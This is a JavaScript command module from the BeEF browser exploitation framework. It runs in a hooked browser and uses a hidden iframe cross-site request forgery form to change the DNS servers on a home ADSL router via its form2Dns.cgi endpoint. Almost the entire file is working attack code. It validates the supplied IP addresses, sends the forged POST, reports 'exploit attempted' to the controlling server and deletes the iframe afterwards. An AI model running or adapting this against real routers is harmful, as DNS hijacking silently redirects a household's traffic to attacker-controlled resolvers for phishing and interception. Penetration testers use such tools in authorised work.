//
// Copyright (c) 2006-2024Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - https://beefproject.com
// See the file 'doc/COPYING' for copying permission
//

beef.execute(function() {

	// config
	var target  = 'http://<%= @rhost %>/form2Dns.cgi';
	var dns1    = '<%= @dns1 %>';
	var dns2    = '<%= @dns2 %>';
	var timeout = 15;

	// validate DNS server IP addresses
	if (!beef.net.is_valid_ip(dns1)) {
		beef.debug('Invalid Primary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Primary DNS server IP address was provided");
		return;
	}
	if (!beef.net.is_valid_ip(dns2)) {
		beef.debug('Invalid Secondary DNS server IP address was provided');
		beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=an invalid Secondary DNS server IP address was provided");
		return;
	}

        // change DNS
        var argw4_adsl_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", "application/x-www-form-urlencoded", [
                {'type':'hidden', 'name':'dnsMode', 'value': '1'},
                {'type':'hidden', 'name':'dns1', 'value': dns1},
                {'type':'hidden', 'name':'dns2', 'value': dns2},
                {'type':'hidden', 'name':'dns3', 'value': ''},
                {'type':'hidden', 'name':'submit.htm?dns.htm', 'value': 'Send'},
                {'type':'hidden', 'name':'save', 'value': 'Apply Changes'}
        ]);

	beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");

	// clean up
	cleanup = function() {
		document.body.removeChild(argw4_adsl_iframe_<%= @command_id %>);
	}
	setTimeout("cleanup()", timeout*1000);

});

